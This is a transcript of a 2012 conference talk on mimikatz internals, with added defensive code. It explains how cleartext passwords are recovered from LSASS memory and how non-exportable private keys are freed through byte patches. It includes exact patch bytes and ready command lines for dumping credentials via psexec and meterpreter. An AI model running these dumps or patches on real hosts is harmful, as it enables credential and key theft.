Workflow (slide diagram): LsaEnumerateLogonSessions → for each LUID → search the linked list wdigest!l_LogSessList for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
	struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
	struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
	DWORD UsageCount;
	struct _KIWI_WDIGEST_LIST_ENTRY *This;
	LUID LocallyUniqueIdentifier;
	[…]
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
	[…]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest :: demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how?
Actually, I've only used a logical (empirical) approach to search for passwords…
– Protocol reading
– Symbols searching
~ Boring ~… let's be more brutal this time: make a WinDBG trap!
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe

0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.

0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3

0: kd> .reload /user
Loading User Symbols

0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp :: how?
Let's log in with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Call stacks captured by the trap (kc 5 at lsasrv!LsaProtectMemory):

lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  [...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah! Pass the Hash capability with Live accounts too…
Live users can log on through RDP via SSO
mimikatz :: sekurlsa :: livessp :: workflow
Workflow (slide diagram): LsaEnumerateLogonSessions → for each LUID → search the linked list livessp!LiveGlobalLogonSessionList for the LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
	DWORD isSupp;
	DWORD unk0;
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
	struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
	struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
	DWORD unk4;
	DWORD unk5;
	PVOID unk6;
	LUID LocallyUniqueIdentifier;
	LSA_UNICODE_STRING UserName;
	PVOID unk7;
	PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me, yes!
mimikatz :: sekurlsa :: kerberos
Let's log in with a normal account
After credentials protection, KerbCreateLogonSession calls
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
Call stacks captured by the trap (kc 5 at lsasrv!LsaProtectMemory):

lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

Kerberos part for password
Kerberos ticket part? Maybe ;)
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow
Workflow (slide diagram): LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl in kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
	DWORD unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
#ifdef _M_X64
	BYTE unk4[32];
#elif defined _M_IX86
	BYTE unk4[20];
#endif
	LUID LocallyUniqueIdentifier;
#ifdef _M_X64
	BYTE unk5[44];
#elif defined _M_IX86
	BYTE unk5[36];
#endif
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow
Workflow (slide diagram): LsaEnumerateLogonSessions → for each LUID → search the linked list kerberos!KerbLogonSessionList for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
	struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
	struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
	DWORD UsageCount;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	DWORD unk3;
	DWORD unk4;
	PVOID unk5;
	PVOID unk6;
	PVOID unk7;
	LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
	DWORD unk8;
#endif
	DWORD unk9;
	DWORD unk10;
	PVOID unk11;
	DWORD unk12;
	DWORD unk13;
	PVOID unk14;
	PVOID unk15;
	PVOID unk16;
	[…]
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos :: “hu ?”
Ok. It works…
But why?
Not at all logons on NT5 (can need an unlock)
From my understanding of Microsoft explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical…
– For password auth
• password hash for shared secret, but keeping the password in memory
– For full smartcard auth
• No password on client
• No hash on client
– NTLM hash on client…
– KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, to be usable.
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) in the LSASS process to take benefit of its keys when we called it.
Can it be fun to decrypt outside the process? – Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too, and “imports” the keys initialized by LSASS – When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we have the same behaviour as when we are in LSASS
mimikatz :: sekurlsa :: LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx
Key layout (slide diagram): inside lsass, lsasrv holds g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]) and g_Feedback (BYTE[8]); mimikatz loads its own lsasrv and copies these values into it (copy…)
mimikatz :: sekurlsa :: LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
Key layout (slide diagram): inside lsass, lsasrv holds InitializationVector (BYTE[16]), h3DesKey and hAesKey (BCrypt key handles, structures below); mimikatz loads its own lsasrv and copies them into it (copy…)

typedef struct _KIWI_BCRYPT_KEY_DATA {
	DWORD size;
	DWORD tag;
	DWORD type;
	DWORD unk0;
	DWORD unk1;
	DWORD unk2;
	DWORD unk3;
	PVOID unk4;
	BYTE data;	/* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
	DWORD size;
	DWORD type;
	PVOID unk0;
	PKIWI_BCRYPT_KEY_DATA cle;
	PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo
Security Packages
Protection Keys
Package         Symbols                                                  Type
tspkg           tspkg!TSGlobalCredTable                                  RTL_AVL_TABLE
wdigest         wdigest!l_LogSessList                                    LIST_ENTRY
livessp         livessp!LiveGlobalLogonSessionList                       LIST_ENTRY
kerberos (nt5)  kerberos!KerbLogonSessionList                            LIST_ENTRY
kerberos (nt6)  kerberos!KerbGlobalLogonSessionTable                     RTL_AVL_TABLE
msv1_0          lsasrv!LogonSessionList / lsasrv!LogonSessionListCount   LIST_ENTRY / ULONG

Key     NT 5 symbols
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key     NT 6 symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey
mimikatz :: sekurlsa :: memo
Some commands:
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
	msv1_0 :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
	 * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
	kerberos :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	wdigest :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	tspkg :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	livessp :
	 n.t. (LUID KO)
mimikatz :: sekurlsa :: what we can do?
Basics
– No physical access to computer (first step to pass the hash, then pass the pass)
– No admin rights, system rights, debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;)
– For privileged accounts, network login instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
• biometrics (it keeps the password somewhere and pushes it to Windows)
• single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Let opportunities to stop retro compatibility
– Disable faulty providers
• Is it supported by Microsoft?
• Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
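A read-only baseline for the last two items (which providers LSASS is registered to load, and whether NTLM is restricted), as an added example that is not part of the talk or of mimikatz. It assumes the documented registry locations named in the code; it changes nothing.

```powershell
# Added example, not from the talk: a read-only baseline of the LSA registration
# points behind the providers the talk discusses, plus the NTLM restriction values.
# Assumes the documented registry locations below; run it before and after a change
# to see which security packages LSASS will load and whether NTLM is restricted.

function Get-LsaProviderBaseline {
    $lsaKey      = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $osConfigKey = Join-Path $lsaKey 'OSConfig'
    $msvKey      = Join-Path $lsaKey 'MSV1_0'

    # "Security Packages" (REG_MULTI_SZ) lists what LSASS loads at boot; NT6 keeps an
    # additional copy under OSConfig, so both are read and merged.
    $packages = @()
    foreach ($key in @($lsaKey, $osConfigKey)) {
        $item = Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue
        if ($item) { $packages += @($item.'Security Packages') }
    }
    $packages = @($packages | ForEach-Object { $_.Trim().ToLowerInvariant() } |
        Where-Object { $_ } | Sort-Object -Unique)

    # The providers whose in-memory credential handling the talk walks through.
    $watched = 'kerberos', 'msv1_0', 'wdigest', 'tspkg', 'livessp'
    $providers = foreach ($name in $watched) {
        [pscustomobject]@{ Provider = $name; Registered = ($packages -contains $name) }
    }

    $lsa = Get-ItemProperty -Path $lsaKey -ErrorAction SilentlyContinue
    $msv = Get-ItemProperty -Path $msvKey -ErrorAction SilentlyContinue
    [pscustomobject]@{
        SecurityPackages = $packages
        Providers        = $providers
        # LmCompatibilityLevel 5 = send NTLMv2 responses only, refuse LM and NTLM.
        LmCompatibilityLevel         = $lsa.LmCompatibilityLevel
        # "Restrict NTLM" policies (NT6): 0 = allow all, 1 = audit all, 2 = deny all.
        RestrictSendingNTLMTraffic   = $msv.RestrictSendingNTLMTraffic
        RestrictReceivingNTLMTraffic = $msv.RestrictReceivingNTLMTraffic
    }
}

$baseline = Get-LsaProviderBaseline
$baseline.Providers | Format-Table -AutoSize
$baseline | Select-Object LmCompatibilityLevel, RestrictSendingNTLMTraffic, RestrictReceivingNTLMTraffic |
    Format-List
```

A missing value prints as empty, which means the policy is not set and the OS default applies.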
mimikatz :: crypto :: what is it?
A little module that I wrote to
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
• Even those which are “not” exportable
What the crypto module can do
– List
• Providers
• Stores
• Certificates
• Keys
– Export
• Certificates
– public, in DER format
– with private keys, in PFX format
• Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
• CryptoAPI in mimikatz context
• CNG in LSASS context (again ;)
mod_mimikatz_crypto
mimikatz :: crypto :: how it's protected?
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
• At least without the master keys and/or passwords of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a “session”
Export/Usage can be limited by
– Password
– Popup
– Export/Archive flag not present
Constraint for most users / Unavailable for computer keys
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works?
“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware.” – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, … – cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi :: how it's exported? ( level)
Export flow (slide diagram): Process → CryptoAPI and RSA CSP (“PLAYSKOOL”) → Load Private Key → DPAPI Decode → Ask to export Key → Exportable? yes: Exported Key / no: NTE_BAD_KEY_STATE
mimikatz :: crypto :: patchcapi :: because I own my process
When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey
This function does all the work to prepare the export and checks if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
	Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider       : Microsoft Enhanced Cryptographic Provider v1.0
	Type           : AT_KEYEXCHANGE
	Exportabilité  : NON
	Taille clé     : 2048
	Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
	Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz :: crypto :: patchcapi :: because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space.
original (rsaenh.dll):
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
patched:
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

original:
.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
patched:
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time
Import, export, import as not exportable… export.
mimikatz :: crypto :: patchcapi :: limitations
Because: – I'm lazy – I've seen, in the majority of cases, RSA keys for real-life use • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time key operations are not made in the "user" process context.
Processes use RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI… – It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported ( level)
[Diagram: CNG export flow, annotated "PLAYSKOOL". Process → CNG: "Ask to export Key" → RPC → KeyIso Service (LSASS process): Load Private Key (DPAPI decode) → Exportable? yes → Exported Key; no → NTE_NOT_SUPPORTED. On NT6, LSASS is a system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP.]
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) → ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz # crypto::exportKeys [user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité  : NON
	Taille clé     : 2048
	Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO - mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
This time checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
original (ncrypt.dll, in LSASS):
.text:6C815210 75 1C    jnz short continue_key_export
patched:
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng :: demo time
Import, export, import as not exportable… export again.
mimikatz :: crypto :: patchcng :: limitations
Patch operation needs some privileges: – Admin (debug privilege) – SYSTEM
mimikatz crypto::patchcng only deals with: – Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?) – certutil can…
mimikatz :: crypto :: patchcng :: bonus
After one admin patched LSASS, all users of the current system benefit from the extra exports – until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too – Yeah, like the good old certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
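The two patches above leave a very small footprint: one opcode byte (75 → EB) in ncrypt.dll inside LSASS, two opcode bytes (0F 85 → 90 E9) in rsaenh.dll inside the calling process, with the jump displacement untouched, and they survive until the KeyIso service restarts. A memory-integrity check that compares a module's code as mapped with the same bytes from the file on disk is the defender's counterpart. The block below is an added example, not code from the talk or from mimikatz: it diffs two views of one code region and classifies each differing run against the two shapes the slides show. The sample regions are constructed by wrapping the slides' byte listings in a few neutral instructions; how the two views are read from a host is left out.

```python
"""Diff a code region against its on-disk original and flag conditional jumps
that were rewritten into unconditional ones. Added example (not mimikatz code);
the sample regions are constructed around the byte listings from the slides."""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class CodeDiff:
    offset: int            # offset of the first differing byte in the region
    original: bytes        # bytes as found on disk
    patched: bytes         # bytes as found in the mapped image
    kind: Optional[str]    # recognised patch shape, or None


def classify_run(original: bytes, patched: bytes) -> Optional[str]:
    """Recognise the two shapes shown in the slides. Only the opcode bytes differ;
    the displacement (rel8 / rel32) that follows is left untouched by both patches."""
    if original == b"\x75" and patched == b"\xEB":          # jnz short -> jmp short
        return "jnz short -> jmp short"
    if original == b"\x0F\x85" and patched == b"\x90\xE9":  # jnz rel32 -> nop ; jmp rel32
        return "jnz rel32 -> nop; jmp rel32"
    return None


def diff_code(disk: bytes, mapped: bytes) -> List[CodeDiff]:
    """Return every run of differing bytes between the two views of one region."""
    if len(disk) != len(mapped):
        raise ValueError("both views must cover the same region")
    diffs: List[CodeDiff] = []
    i, n = 0, len(disk)
    while i < n:
        if disk[i] == mapped[i]:
            i += 1
            continue
        start = i
        while i < n and disk[i] != mapped[i]:
            i += 1
        original, patched = disk[start:i], mapped[start:i]
        diffs.append(CodeDiff(start, original, patched, classify_run(original, patched)))
    return diffs


def export_check_bypassed(disk: bytes, mapped: bytes) -> List[CodeDiff]:
    """Only the diffs whose shape matches a forced jump (the signal worth alerting on)."""
    return [d for d in diff_code(disk, mapped) if d.kind is not None]


# Constructed sample regions: the slides' bytes wrapped in a few neutral
# instructions (mov eax,[ebp+8] / test eax,eax / xor eax,eax / pop ebp / ret).
# rsaenh.dll style: 0F 85 rel32 (jnz) becomes 90 E9 rel32 (nop; jmp).
RSAENH_DISK = bytes.fromhex("8B 45 08 85 C0 0F 85 33 C7 FF FF 33 C0 5D C3")
RSAENH_MAPPED = bytes.fromhex("8B 45 08 85 C0 90 E9 33 C7 FF FF 33 C0 5D C3")
# ncrypt.dll style: 75 rel8 (jnz short) becomes EB rel8 (jmp short).
NCRYPT_DISK = bytes.fromhex("85 C0 75 1C 33 C0 C3")
NCRYPT_MAPPED = bytes.fromhex("85 C0 EB 1C 33 C0 C3")


if __name__ == "__main__":
    for name, disk, mapped in (("rsaenh", RSAENH_DISK, RSAENH_MAPPED),
                               ("ncrypt", NCRYPT_DISK, NCRYPT_MAPPED)):
        for d in diff_code(disk, mapped):
            print(f"{name}: +0x{d.offset:x} {d.original.hex()} -> {d.patched.hex()} "
                  f"[{d.kind or 'unclassified'}]")
```

Reading the two views (the file bytes versus the module as mapped in lsass.exe or in the calling process) is host-specific; the comparison and the classification are the part that generalises. diff_code reports every differing run, and export_check_bypassed only filters, because a region that differs without matching either shape still deserves a look (relocations aside, code sections of a mapped image should match the file).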
mimikatz :: crypto :: memo
Some commands:
  mimikatz crypto::patchcapi crypto::exportCertificates exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
  mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password – PFX files are protected by this password: mimikatz
Keys – When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it? • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do
Exactly the same as for sekurlsa: prevent access to accounts / computer – no admin, no admin, no admin…
Basics – Use smartcards/tokens for users' certificates – Use Hardware Security Modules (HSM), even SoftHSM
More in depth – See what Microsoft can do with TPM from Windows 8 • Virtual SmartCard seems promising – Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver – Play with tokens & privileges – Display SSDT x86 & x64 – List minifilters actions – List Notifications (process, thread, image, registry) – List Objects hooks and procedures – …
…
mimikatz :: that's all folks
Thanks to:
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity • Partners and Sponsors for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges • nagual, newsoft, mubix…
– You for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: wdigest :: what is it?
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]" – Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios – Authenticated client access to a Web site – Authenticated client access using SASL – Authenticated client access with integrity protection to a directory service using LDAP" – Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool – No password over the network, just hashes – No reversible password in Active Directory, hashes for each realm • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest :: what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[…]:HA2)
• HA1 = MD5(username:realm:password)
• HA2 = MD5(method:digestURI[…])
Even after login HA1 may change… the realm comes from the server side and cannot be determined before Windows logon.
The WDigest provider must have the elements to compute responses for different servers: – Username – Realm (from server) – Password
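A worked calculation of the digest exchange described above, added here as an example (not from the talk): the RFC 2617 illustration values for user Mufasa, with the client's computation and the server-side check from a stored per-realm HA1. The `Challenge` class is an assumption standing in for the realm/nonce/qop fields of the server's WWW-Authenticate header. It shows the point of the slide: a server needs only HA1 for its own realm, but a client that has to answer whatever realm a server sends must still hold the password (or one HA1 per realm it has already seen).

```python
"""RFC 2617 Digest access authentication (qop=auth), computed step by step.
Added example, not from the talk; the credentials and nonce are the RFC's own
illustration values, and 'Challenge' is a hypothetical container for what the
server sends in WWW-Authenticate."""
import hashlib
import hmac
from dataclasses import dataclass


def md5_hex(*parts: str) -> str:
    """MD5 over the colon-joined fields, hex encoded (the H(...) of the RFC)."""
    return hashlib.md5(":".join(parts).encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    # HA1 depends on the realm, which the server chooses: with password
    # credentials the client cannot precompute it for a realm it has not seen.
    return md5_hex(username, realm, password)


def ha2(method: str, digest_uri: str) -> str:
    return md5_hex(method, digest_uri)


def digest_response(h_a1: str, nonce: str, nc: str, cnonce: str, qop: str, h_a2: str) -> str:
    # H = MD5(HA1:nonce:nc:cnonce:qop:HA2); with qop=auth the slide's "[...]" is nc:cnonce:qop
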